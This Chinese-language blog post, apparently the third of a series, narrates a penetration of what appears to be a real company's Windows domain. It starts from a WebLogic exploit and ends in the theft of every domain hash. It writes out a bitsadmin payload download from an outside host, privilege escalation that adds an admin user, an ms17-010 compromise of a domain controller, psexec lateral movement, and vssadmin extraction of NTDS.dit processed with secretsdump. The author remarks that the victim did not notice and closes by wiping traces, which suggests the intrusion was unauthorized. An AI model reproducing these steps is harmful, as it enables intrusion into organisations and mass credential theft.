Weblogic引发的血案-3

发表于 | 分类于 | 热度

无状态

直接用WebLogic_Wls-Wsat_RCE_Exp.jarexp获取到shell,和上上篇文章一样。

信息收集

1
2
3
4
5
6
hostname -->BX1
systeminfo -->Windows Server 2012 R2 Standard 169补丁
ipconfig -->192.168.2.23 
whoami & net localgroup administrators -->得知当前用户属于管理员组,同时不确定管理员组里帐号(kxadmin)是不是域管
tasklist -->WRSA.exe Webroot杀软(一开始没注意到这线程,以为没杀软,绕了点弯路)
所属域 -->Kx

攻击

像开始说的,我是没有注意到WRSA.exe这款杀软,但是习惯性的用了Veil生成msf的exp,恰好又能过(virustotal.com)

利用bitsadmin命令将exp上传到目标机

1
bitsadmin /transfer n http://xxx.xxx.xxx/xxx.exe C:\xxx\xxx.exe


msf监听并反弹meterpreter的shell

这里和 Weblogic引发的血案-2有点像,哈哈哈,入口点都一样。

域信息收集

先收集一下域信息,找找域管,找找域控。

1
2
3
net group 查看组名
net group "domain admins" /domain 查看域管理员
nltest /dclist:kx 查看域控

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net group "Domain Admins" /domain
net group "Domain Admins" /domain
The request will be processed at a domain controller for domain Kx.
Members
-------------------------------------------------------------------------------
xxxx                  Administrator            xxxx
kxadmin                  xxxx                xxxx

C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>nltest /dclist:Kx
nltest /dclist:K2x
Get list of DCs in domain 'Kx' from '\\AD1.Kx'.
    AD1.Kx [PDC]  [DS] Site: Default-First-Site-Name
    AD2.Kx        [DS] Site: Default-First-Site-Name
    AD3.Kx        [DS] Site: Default-First-Site-Name

说明:xxxx代表的是马赛克

利用ping命令得到域控IP

1
2
3
AD1.Kx -->192.168.2.225 域控
AD2.Kx -->192.168.2.215 域控
AD3.Kx -->192.168.2.245 域控

该机子的管理员组可能存在有域管账号,如果能抓出哈希岂不是美滋滋?但是当前权限不是NT AUTHORITY\SYSTEM所以msf加载的mimikatz是抓不出哈希的

1
2
3
4
5
6
7
8
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net localgroup administrators
Members
-------------------------------------------------------------------------------
Administrator
Kx\xxxx
Kx\xxxx
Kx\kxadmin(可能是域管账号)
说明:这里不能说Administrator用户为域管,因为本机默认有个adminstrator,域控默认也有1个,但这两个并不是同一个。

提权啊

迷惑点

综合上述,这里有个问题就是判断域管的时候留下的,就是执行net localgroup administrators显示有kx\kxadmin管理员用户,然后执行net group "domain admins" /domain查看域管当中也有kxadmin用户,这是kx\kxadmin迷惑了我(kx是域控),注意这个账号的格式是域控\账号,这里和远程登入域机器的时候输入域管账号一样,格式也是域控\账号。所以这里的kx\admin账号是域管的概率很大,因为它标识了。总的来说,验证的方法也很简单,就是读取kx\kxadmin的密码,能登入域控的话就是域管账号了。

提权失败

好久没有提权了,记得上次用pr.exe提了台机子还是半年前的事。

Windows-Exploit-Suggester(提权辅助工具)

在目标价执行systeminfo>1.txt,然后将1.txt拖回本地

1
python windows-exploit-suggester.py --database 2018-04-10-mssb.xls --systeminfo 1.txt


这里只截取了一小部分的图,绿色代表可以利用的提权工具,参考文章

ms15-051

运行ms15-051.exe结果懵逼了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>ms15-051.exe "net user admin1 Qqaazz7
41/add"
ms15-051.exe "net user admin1 Qqaazz741/add"

C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>dir

 Directory of C:\Oracle\Middleware\user_projects\domains\bifoundation_domain

04/12/2018  06:43 AM    <DIR>          .
04/12/2018  06:43 AM    <DIR>          ..
11/10/2017  09:34 AM               144 edit.lok
07/23/2016  08:17 PM               506 fileRealm.properties
07/23/2016  08:17 PM    <DIR>          init-info

emmmmm运行完之后,提权工具没了?!

当时第一反应就是被杀了,再一次看了进程才发现有个WRSA.exe杀软,好吧,第一次遇到,没注意。

Webroot杀软

手上也没有免杀的提权工具,这就很难受了。

meterpreter

msf自带的试试,search了几个15 16的提权模块,设置session之后 run!然而并没有用,meterpreter迁移进程getsystem也不管用
提权难啊提权难

内网游游

还在为提权想办法时,扫内网发现了192.168.2.245域控存在ms17-010!这次你还不死。

添加用户怼!

远程登入


迫不得已的时候才用这招,当时登入的时候还被挤下线了,好采对方没发觉什么。

mimiktaz


不是明文的,cmd5可破。

Cobalt Strike

利用该域控上线个cs然后arp登入一波域内机子就差不多完事了,但是死活上线不了,各种姿势都试过了,就是不给你上线,exp在进程里面了就是不给你上线(能通外网),刚开始以为是该域控环境有问题,所以就拿着域管登入到其他两个域控,还是不给上线,行吧,我在换多几台试试总可以了吧?换了不下十台机子,就是不给你上线,好气。最后以为是自己的Cobalt Strike有问题,本地运行下exp结果秒上线,狗噢。

MSF

都说Cobalt Strikemsf的界面版,那我改用msf总行吧。
添加msf路由,使得msf能访问到目标内网,参考文章

登入域里的机器,使用到的模块

1
use exploit/windows/smb/psexec

设置对应的SMBDomain,SMBUer,SMBPass,run登入。结果三台域控没上线,只上线了两台,当时忘截图了,心累。

NTDS.dit文件

获取NTDS.dit文件,导出域控里全部域用户哈希。导出方式参考文章

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
C:\Windows\System32>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'c:\'
    Shadow Copy ID: {b1a1be28-c02a-4402-bf80-f82b46673b03}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4

C:\Windows\System32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {56512710-bc51-4ba7-98cc-4d1c5d7b75ae}
   Contained 1 shadow copies at creation time: 4/12/2018 2:07:02 AM
      Shadow Copy ID: {b1a1be28-c02a-4402-bf80-f82b46673b03}
         Original Volume: (C:)\\?\Volume{aececd34-32d8-4d4f-9dc6-184ea98a825f}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4
         Originating Machine: AD3.Kx
         Service Machine: AD3.Kx
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential


C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\NTDS.dit c:\
        1 file(s) copied.

C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\system c:\
        1 file(s) copied.

C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\sam c:\
        1 file(s) copied.

NTDS.dit,system,sam 三个文件拖回kali里,DUMP NTDS.dit文件参考文章

1
python secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/SYSTEM LOCAL

说明:这里一定要在/root/下创建ntds_cracking目录然后将ntds.dit放到该目录,路径是/root/ntds_cracking/ntds.dit 不然会报错。

这已经是第三章了,过不了多久会出第四第五章,也有可能第四章是终章,很多技术都没用到,比如MS14-068漏洞,假令牌,金票据,如何猥琐得到域管账号,从工作组到域渗透,很多很多,接下来的日子在慢慢写,当然了,这也是学习技术的过程。
老规矩,擦屁股走人~